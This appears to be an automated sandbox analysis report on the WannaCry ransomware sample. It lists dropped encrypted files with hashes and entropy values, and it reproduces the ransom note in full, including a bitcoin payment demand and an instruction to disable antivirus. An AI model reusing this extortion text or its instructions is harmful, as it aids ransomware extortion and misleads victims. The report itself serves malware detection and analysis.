                                                  Preview:WANACRY!.......ot%...g..}..&.d.q.!.S..."+.b.B5*.tB!..y.....e.'?..}.(NE..M....>L....A....a.a.c...-..c;..V.X....4...._.`#Y..g........95.ot7.!....*4..w....C.?.$..j.EF....\Pi......... ..."/.c&...6#.].mV/..7..b..e..<.....}..I..\i...s..=i..O3....5.0.i.h............;..?...%!I...0h.......7U.-..B..dM.....#..:...$I...]U....&f...n].v......\..'.....A......\:S.c$...m)..*0..s../.v...P..w.h....}..-...(X..[.P......U.uO...........AJo.........Qo.,.,..-..m..".P.h..r.N6.d9.l....v.....)....|M..+@.k.!....3...&.i.c...0...[......,|t.l..lN".:-.}2.x.D..m2..nA./.%..&.c....]5..l1.^._.....w/@.... V.E..".l..B.p........Oe...a..)uC.....K..L......&U..Y.....Cu$f1........]c..>+`...;u...>lN.u...S..Y..5g.T..G.0y..9..O{...K..B...q......1g......r<[nI.E.xl....4...w.Q...Id......K.rX}i.....KU....I.D....=%...._....h..M.lt0....%1..9..<[>.y.7K..|....[..F.D.b.{<D....7|..+.$t..t..P".DG...}.tv+..K+2U{....?Lu...H.t.z.....7........N..[..).r&%. ].<I.d.].?..m.x....Q.z.F...y.}-.Y,4

                                                  C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):89816
                                                  Entropy (8bit):7.99792862114747
                                                  Encrypted:true
                                                  SSDEEP:1536:D2nwlTItrIZF+b1wEq0/MUk/oWOeylbs477wrDLxLIXdGIaEZ:ww1KXtqaML69bsS7sxUXge
                                                  MD5:E8671AE2A7936B35DCFCA9EF944B03AC
                                                  SHA1:2647715F91BCAD7D8E6500F4BFF07EE949C6C096
                                                  SHA-256:74B6028441DCA20B12ED6F757F3371E084A7F0D18E79B5E3756D39D62C633CDA
                                                  SHA-512:4122A45791BB92A928FEB65ECB475FDDCA77066A0F6068D273DBBAAD7AA946158D1FF103841C9365F40C10FB6E4D3A5EEB9A4C7055C2F87CE0D1AD5B4C06346A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....%TE.i.D^pk../}.^j.H.n.09.E'.a....V...."....f..<T*n'l.....r.......D..u+."v..G<.]...d6.n...}....4.{)..W..@.M.T...{^..y.~..n.r.G.w.K;..@...P=.d-....+...................J.Pdi6....C..U...O..'.Z.q......a*...H~..c.!C........A....u/3"....ZJ..rE}.S...1j.....]..........Nyk.5e...s..]..^.0r.;...D..N nk....]....._.JJ.....|.!^..a.%..I~....v.....:CV".....+...yw.....\....N.2.(w.`q(v.m..Zq|..lf.G...T.........%..F...,...j.\.......eh...b.c..0H.C.a.......i.A$#..G.F*.?8`.y~.J@#_h.-...&.VA.U...8h.K...F..V.,.Z.-Or?E.r+..nP..k...N^>lS.......+\@..g...?R9g........].%e.W1AR..5`....(tk9".........p...Ef...2...g.P...`..$*B..D.....P~..c...._..9..1....-u*..NE._.]i59q.?.......P.J..;\m........i......s.ER.....6,..wY....9....."..T.....8q...C..S....R6!..2:Kb-..0..ev)..,.<"...o......L.4g'..&..L.d..,V)2..2....\o...8.l./C....5.$.0.o..CZ..s...e....8..%......[.......E>N._.>....J....=I.[f..+o,9..w.~t...)'.....n^.rD.....L#K..$~..`@._/..........Fh...[..).Y..mp.1....

                                                  C:\ProgramData\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):516712
                                                  Entropy (8bit):7.9995955877153
                                                  Encrypted:true
                                                  SSDEEP:12288:WaXWduW49+v/Ek35WN33bc7uFCt3o5KF8BkRC2q70Yl1wntD:WJdP40zQN3w7u+3o548kRrdnB
                                                  MD5:839F0C5A094933ABF99406F7D518C732
                                                  SHA1:452A72A8C2CBD433ECC6E7389ECC8386A7CC95DE
                                                  SHA-256:42B8EA4FAE72B802277437FE8979FAE7737D3724CA1EA3450FA43AA133CB7461
                                                  SHA-512:116118455646D84579498D54D5A9E1F4480BA61E51B05AD14F485EE0E928E0ADFEA2A52F465E26FCB47B7AA7C0EF885E90EF728C615478B99B041774B0F80203
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......=g...J..L(^..'...UBL....E..I@....{ji............6*..e...v+__..z...h...s...g....%.8.;@...B.H.%OA..:.<..pn...D8.#.;8...?S1..xu..Qi....yz..S...IpHi..$].ox...>...X..)C.e.w....jzR.p...=....>\z...[.l!..k...pa..|ye.2..$.h.K..\.R.._.1x.$<.{X.q..V>.$....H........|..j5..)l....y.v&......&.-U....o3.u.|AcF\........S..r.eo.5K.y....vt..6...S...s...Q{s...+.z.=....,.Q...O..x.91B..[.5Ss.z..)..1&.....3...rts....7.7...3...dm.......BGH"*.2z...K..nEl..}B1+.0G9?......O..E.)Q.".....c."...p.b....H<.y+.....@n.(.k,W..+U....'.....X..t..9....TpK(Y.:`N..S.._i-.._b...J....jOFr.L.$|......Vi...H.c...Y....<#...m...{.....?..B.(#^.F..f.l...V.$t.H.......Y.D...0..].69".u..U...J.U.s...%....?.=.J0..<..-...(.k...j..z..8=.....ic$p......c."..~|>.5d.....&#.\.U....(q1.%..l..:v.8....!@.V...Q.@.(.g..._..K..~f......../mwl)=t.....TCd..(.L...4...>j.l..8%.E..E;>.b......uT.>..m..&.^..._.6.i...k.=B.I(jk..m.mkz.........k.a#.=.Q.npS.H............C<..[.K4G.."h..&uh..k...x.

                                                  C:\ProgramData\Microsoft\Windows\Caches\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.986883871069837
                                                  Encrypted:false
                                                  SSDEEP:384:mQ/XC18aH687FhH8rHDKTKkdzJV5OLCcuSWz3fLULR:m0A8fg0DgpJV5OLCvnUt
                                                  MD5:7471FDE09A4BAB127F608A5298C84825
                                                  SHA1:03C6EBBC6DEA879F2DE39E730AF9C910B09A2B55
                                                  SHA-256:7B8004E550D07730E08D3F7DA1B8CF8EC6D5FF0F73C6E9644B206876F3161D2D
                                                  SHA-512:EB4865BA6B1B7E2C2C3E61F1B1830039E826BD474C1961462630D04D905AD820DC7718F241E5BA21DAAFFCAF54F6083BC5EB13E362EB15FEE0A3001039ED8D38
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....^Wq.... .}cd.HN4.'.i.}.....2..M...t.k.....z.}.....M....k..W.\N...%..,8....8..v....5.....[.T.t.5.%@.3...8.I....#........Au.t..ZK.Y....h.8.v..p.S..9.h..E.,....J.">..z..N.~.&w>..(>N...F...z.dy......]b.....u..;.)..V.M@.2&.m...>.S..s......R..d........@......vI....z;'$.+...J...[..P6..l.m..d.y.;.?..>....XN.g..|lhx.)........V.....H...a.C<JC.y.3.l.#.........I0*..Q.q8..*gr...?S.E..EY.Zv.E...:..9O....m.....D...s.c.Z.-....E.Z}).%.!~.9.U'.m...6..j*.e.X..P..0.S..|Q:.....'.........38...p.u..r<9M..+Y...J...t.k.RD.......u.Z..#.U. /Rc...Q.f.UO.~...TR...u..a..Pw...7...(.w.._.....gj..}q.2j....m..9].y...3V.}d.......#.]..]wdU.m...,.[..~pR.C..+.G...pV.#_@..........CO......B.M..f.y1NjGh.y..li.Z.}..9..b..r..J....?SC.0.5.Q....\o[..ko....Z3.\........ka....j....`....q.B.D.y.%....dy...z..=^f..2....C.|(n"..z..V...!.z.....[8.'VD.i.F.M=...m..'....Z..,.../.(|^..E..j....i.k.HK.......+..H......x.^..`#o..N.z.;............S.9.........G.').Q{ZGZ(.j7...Js.{.z

                                                  C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296168
                                                  Entropy (8bit):7.999470417377871
                                                  Encrypted:true
                                                  SSDEEP:6144:DkeHYtO4SYWuLDKQX9sueZYfbD4Mka1kK7:tHYE4FPXmYz1ka7
                                                  MD5:88C4E88E1535BAB936AEAF4B22BA7FCB
                                                  SHA1:A1ACEB310B94027662D2640FC6AE3B0D56B27BD3
                                                  SHA-256:99EB622C462E3C79FAC389E3E1246726B3E1BA2EFB33EAA4932B87B6BAE00EC4
                                                  SHA-512:17F70FE204C9EA6F245B18CB276E364F9640F4633199B17E4EAFE905F5FB086A65A3B3B7F99962BE7DFF04EEE60E5975D6313E5039C12EB9A9E4B9284B61E0FB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....W{..`.w..{.......L..O.Lh.9.E..DY..M.6]...<r.i\d....U....+........@.....v{.I...,G.l.Z..!5...M.|...j..*....e.].....i..dc.J.Q.].....s.08...JK...O.#[.L..$+.*9.bO...3......J^..........Oel.i.......S\...A.'.l..b]r#,B...[...q-.....D.]......qr................|.<6.X$.g#.....s..SA.....u..{..............~.R./...|.z....".:...Hp.R...r.....^.GS.aXU...J.=...:.7..DQdcb6.......@.(..}c..E.ur..(}.6.x......k.q\......._......u..'-...w.....g.....J..x[.|.....!.0...v.1x......C_G.F........!..-...B..|}..s.........;...n.t...F...A.Xvm.N........B>..'..Y(..........q.l.. .0[..N#I.*...Y.r..D+!.n8.0....B.H.2......c..;.u.RW\@.x/0.q.......~S.1..U..Q`.Y~:.5..@...+dln.b....aA...e\.!..0'._...D...J.'c... k%..'..."./.....6..?h......l...w.._..|2F...)C.1...............d.]..x..U.....%....<cq..H..;...GQ.X.....KI\.....e.Mb{..p..}W.. 4..~I....pFRV..`....a..Q...A..7 <...fy}~.a.....E.Fx.@9x..[..../A.G>...]X..z..T..u.^.j.^.$N^...k?..!S../....S=C.P!.T.W........V@~.>

                                                  C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296392
                                                  Entropy (8bit):7.999442249256408
                                                  Encrypted:true
                                                  SSDEEP:6144:sh66JcR6DZAxvxB3dCJ2vtwwYDVAIJ55xENNpIFmrLI9vfrdkQV:s4R6ESZAsaIFnZf5kA
                                                  MD5:439901958027F98661C574C0BDC1DE07
                                                  SHA1:FED1BA87122D683B437414EFFF8E3E570ECD3D30
                                                  SHA-256:10ECE5BC030AADE921A1841CD8E52FD3491519E4E6BDD3612F566D62711ED4DE
                                                  SHA-512:CCF3593B36E869AFDB7109342B6D6394BAE495D979A399BC32AB7E755A6F24B3E517CD0FF71356D4138CF0DEE814E888BF0878BFAECC4B308CB31264CD3CFA99
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...._.....(.}9.#/....^;f..8?I....W..?.Tr.KB.G....E;..-,...c..R...?i....zn...F}S..-(.n.o.!.:...;......(....=.......`C0.4-K.[...R>...g.....1.....f.J..Z5..A.G.r.O.e6._B.....).QC..CY../.a..h.....W.../..+.9...X.K..@...ec....".5.nt.....]...#.K.Z....8G?..B............2....M..N...|'.c.....-...1.>.v#|.';.....c.n........6n|...D....'u............l...[$..".G|).@.>%........e..T..V<.DF9m..T..:e/.K.....hK.+...1*L.........l...-%{...y..?STk..t.]7E]W..(.-.......i...n:;.M.....<...{L.o.'.L.P.1$k..E}sOd..e..)./C.I_iD.G.....>.,{?.8S.G2w.<...p.I?.5vv..q...Q...L...)....|A=.q".]".....U\.v^8`a6...[..7..:.}.+.>....SI........gZG3.@.....^.Ss...w..{V........7.'.*c....@...r..Bq.D....lJl.0`8".]..T......qj.:.6..f.........P..Q.o...Q.F........8.#...pBF,~.V..7~...>g...vxp..V..D..............s}.6\..Xa!.....~M...R..4...D'.?.F.k<..r...P.l..&...0-|.LM....u.<{?..y...x....u.e..9:...'.....dwz.m..B^.&......SP.V.zkb]...(...".~.c...2L...J.....D.?]#....PQ(...T..f......lE...B.ny.<......

                                                  C:\ProgramData\Microsoft\Windows\Caches\{C4C1099F-F739-440C-87E6-A09DB237D75F}.2.ver0x0000000000000001.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1528
                                                  Entropy (8bit):7.875693784149082
                                                  Encrypted:false
                                                  SSDEEP:24:bkOHxhsglhh8Y5W3j5AW0JsF26D04erFk0i2doCcnnA95s8YcV31QgT5a+sTMDqu:bk2xNklj5AW0J626D0H1XdoCYnAPs8x9
                                                  MD5:489B29A22AEFF46AF94C10AAE1A35958
                                                  SHA1:53ADA06A7870C1B84BB993CCED092A364F4B811D
                                                  SHA-256:701263BDC4F927C1C84FC3B507DE5054D32D5ADA35D7E6DD24DD372148D1BD3C
                                                  SHA-512:05B4F69A9190F5C693FA4A6285C1887B625111597A5F9E2AFFFB79D53806CBB810A0D39BDC90E27E984E425C0F354E42880524BF66AC4E47951ECCC3D6F2AFFF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......Dn..W.4\.Dc..k.S.SU...d..}......v.'.B..t...P9g.....i*=....@.w4..v.........P.Z.n.......N.t.;%.Y..u.l.z..~.gzl..`..S.b.....\.p..O.J.i......s..d...&.$.x.8.Sv..b0.....2....UL*.H.Z.r..D..`.b..T.V.m..>.6yO-...gP%I%......OO'5.V...e.....Y..t...1.Q.............(.Z:..|U.E.<...t(...'....k..w.Vr.....).......M1..L...8...K....6.*.U...........mf.Mf........<...*.S.4Y@.J.......&...*4..y....w.j)..^...e..^.......)....[.....................r/.t.....%O:.{.m'.^.%...D.k.Qx.wI.....Rq..E...(..2w'..z.l...y....=c~...#.T*.]I......)Q.Fb.A.....`.E..X.kT...<;...U.....M......;A.J....._.\of...qI<.-..`..`.]}...1O..J......\..Hi.gX.k.)..mt.O'..7%.2X^!3H.H...-,/.....r.t'2..u.K..5..5.F&*.\. ...zF.T...5&..X.........a..5.a.`..b.C..:HO~.,.....c:.9D...ry......p'N..y;.|s..Z......`..m......f.^H.#....`.{.t.-.M..%@eS.A...O....-O.......1]w..Y.A}.x{v.N.)!......@.Q..t.....r0!....;.{.B.:Duf(....(^.p.2x5....Aw{..o...%.EG.x.bO...7....+*M.u...|(...5.D..'!.l@.}.[.

                                                  C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):638136
                                                  Entropy (8bit):7.999681012444283
                                                  Encrypted:true
                                                  SSDEEP:12288:wgjBsafi7RQ8hvjGCMasmdFjDZHwZdjYjTrt8QlR2WkUsSizpXA:DVf6pvTZseFjDGHjYnDKmsSiz5A
                                                  MD5:61161E2251555FB621FA63D54919C8B3
                                                  SHA1:8EB4DD68FD6A6D514573FFF3C57EF6FC879FEB91
                                                  SHA-256:C37E8C5A87208139F48F6923E8378AF728AD95578353C0FF7EAFD8AFC9C60149
                                                  SHA-512:9341B56E54FCFB674F36F8F8CB343145E90D7E4185387073214D08CBC64F6021B5CC1749C9EF03C181AB639EDD6F00808660FF5FEBAA225FB31E4A032BBAC707
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........av.....f];.@...%...s:V..D.....-..yD@.SB.\n.....W.z..-9.E..i.Nk).-....M.-..l3..+5.+.]....`..V..w....SD.el..`..n;...F>.un..S.6..8.....7.%.....%...JCdS....2..z........-...jgu.5.).,%5p...UN..D.,Ae.o"$...).5..mI.I.x.+.K...1..[..z.. ..G..]...d5...............C.9BZ-.....n|.C..gbU"p...:Q...A6.`.....<H....e.Dh(.=...t~..YM.xbu.....5.1.i..wu3W........h....|......o..*#kb.z......Vb.B. .G@?>....i\=..........G.Kr.....s.X%3s.3...Z.. .@(.4S...B".A%2..d..K.{{td........[]8..7....$M6.QE.....K.If...\.$.{6.t.p....m9.N.)C.g...........}.E.h...X.R.i..t7V..,M....=a............6.{"...Os./..K."......T...Vl.u.X.(./... cM....../N.F.HP2w.....d.E/`B...7G..,...R.t./.. l\.j.k..........q@]......D.......6=*+B...2....e.`...+m.%.H.....l...}.E..{......r...l.f..v(Y5..M.q.+..T..8...3....B......%B.'..\..|..8.+.~.@.....v;n..7...1..X.$A..O=YC:X.6.@tg....>...jc..'.q...2o..G."y.0.pFW.j.;...&~.C......%/(m.....z..0.}.$...y..+*.O.Y.P"X..}B..M.E..Sy....?3dV...9^.84.z.T...

                                                  C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):84536
                                                  Entropy (8bit):7.997941526731215
                                                  Encrypted:true
                                                  SSDEEP:1536:1pdllMBcPWT9/S38i3ta5ozWpUn7JDlnfkaI6m6PRk1B+mlL3VuaNcYoHzKnb:1PoCPWT97kta5ozWOnlDlnb13QlcaToK
                                                  MD5:C10E921BC884342E3C79231210EA6057
                                                  SHA1:70EB3A3601B152949A8CBAB5F7E343844BFE233D
                                                  SHA-256:FF51F972B68746B5BBA2182C782F3AC13598BBCB1C6040A3A3561A03C8EC9233
                                                  SHA-512:A84AD9714B7C78E4844DBCCC8B76FE934549363E0BBBE4F11C65034699CD203CC10A93CB4A29F6FD8744633B751AB2553C5679E1015DD71297DD7E0839E29D33
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....C...i..5.2.M..vX..m,..[.FC.1..;.....s\C....k..my..V.....?...Q...w.\....... U.)....rV.....[....O.... .Z._u..gK..4.^..k.]./.t.3I....\nM....?#.UX.b+.y.0.l......Z=pHRg.m.....)Y..R+[p.W\.G,....2.._....QZ~........S-...gQ.7...k.:...bT.........E..q.........I.......d.q...LL../w..u.M#._....&2...,{.*.O:jG=.vWw....G.:...>..h#......-..h|.4......xh...hl...*:2..b..=FO..L.Z.(:..{...l0z...N.K.o..[.&.....*.....P...(.&X.*..F!K2...vl6p..8B.=<..s...Y.{.Pd7.0a.G....<&t.....,.#..@...Vt+:..+7..q.w=.JQ...r.{....9D.....O..d./.#...n....F......~.j..2....!........He....?..zg.k...h(/...(.3...+.....).{..<.......hv.(...QC-.{.....eC.2..2./"..}.W..G8A......Eiv.......#.0".6..d..............A./...J5.\q9.~....E?1.|.().j3h%.wgo$..l.....l.!...m.=.Ez:.&..Hy.H..Hv...P..l9..m..)S.<0.T.^.....5.d.>...[N..t6t.......}.W(%...~.b.+X..y.c.R.q..R.z.a.TUZ....Y..We-...P..8.oiB}|...u...lY...s...t.xX.0.Y..o..{.&,c.%v*.Z.X.....@:..........7..a...[.j..p..... ...!...38..l.

                                                  C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289832
                                                  Entropy (8bit):7.999207360977147
                                                  Encrypted:true
                                                  SSDEEP:6144:I3WAfY3QMMEC0+XgG0TzHV0gIcDL0zJv+r7UR4X/3RAPF3lT:I3WiY3QM+S0Nkm9+r724pUP
                                                  MD5:30664C86053D088D46328DDB29193BB9
                                                  SHA1:D5B89957F5AE8D0174437D085DFAB84CFE452F7D
                                                  SHA-256:DA1B0BE7034CAE13D4DAE0C1AA8C784A7B6C2846512822594657C45ADF53F132
                                                  SHA-512:BC8B80021E671A5541D90EEA0A4F71F088EBFAA80BD232E799D7F07F4D1777F7AF00B067AC0B5AA8972AC059B522F5F76EFBF2EFBBBB40B4165005804E8669D6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......%.....I.T.M;._..2..>.~.}e....i...W4M...t.#F....fq.8_....lo..R,?y1...^.oD.}.r^......).O}.~%......H..J..n.K=Irk...M..l....Q.#..[6..m....6ij.m..o...R...%..Ux........F... ....m.h.....`..+x...t..K.._....Q..b....U\.^....n...3......E.+G...B......e..G.....k...........[..@.5.#~..t.W...(.nU..0g.w....]..........ne^..).....=....B..}...>.....q?.#.S....=.........C.o$x..OA.F ...6.O.p...*..K.MTz6....r..w...._......]QW........A...[]Y..T).,.M...Jhj.R..q..<?.....L.#.P.../.M.`..y.C;(.G.;.T.]>.G.o../Sh.."A..A.....H.....2I....)..j<.^"9=R...:8%.J..L./\.,..{.I.f9..H.Mi.)..._...@.....R.~.H...Eh.Dd.s.....~:.l...TN.3..q|.....8....6F....h...yIm:@...^...w-... .....Uo.......b.D8.@......+)..7TK.c....~...M.e.$...?.W...<.[jk.l....R6..Fuv.E..G..z...f.\9`/.. .C..LA.2..'..1.b%.D...*?.....0.Y9..)..}VK.....G...'.{9...=?.F..Zio.8...c..GjQ.*...b6P.g......)..eK......*....K~..k...f.....&v.)...zbM.9Si.,g.^.9T.j.g.....:.%.h..\..N..wd6\?l.... ...OEs...H.......

                                                  C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\mscc-0.4.2.min[1].js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4872
                                                  Entropy (8bit):7.9597375337008645
                                                  Encrypted:false
                                                  SSDEEP:96:oIkwYA3k86nffc6adFrTxZHZ5txaQU1hLACkLCjG6iFELuZHdOt:kAU7nf06aBo1pABGjjl6Z9Ot
                                                  MD5:E75335AC5D37B79FFF35A4709B0C31F9
                                                  SHA1:743891ED50B75A48A34C495E03F4095BC274B1FA
                                                  SHA-256:F35013D8346EF5FE92AD5297B735EBBDCD410FE03904C4107E710742D0C43F72
                                                  SHA-512:F397E3924D7C49D9321DD1ED33BD76315E5603F52EBC7AA4AED46B8382971E3A403734A39BA87395ED7CDFBBCCA04A98FB38DAF1385E9F7AFF92314C31819DE8
                                                  Malicious:false
                                                  Reputation:unknown
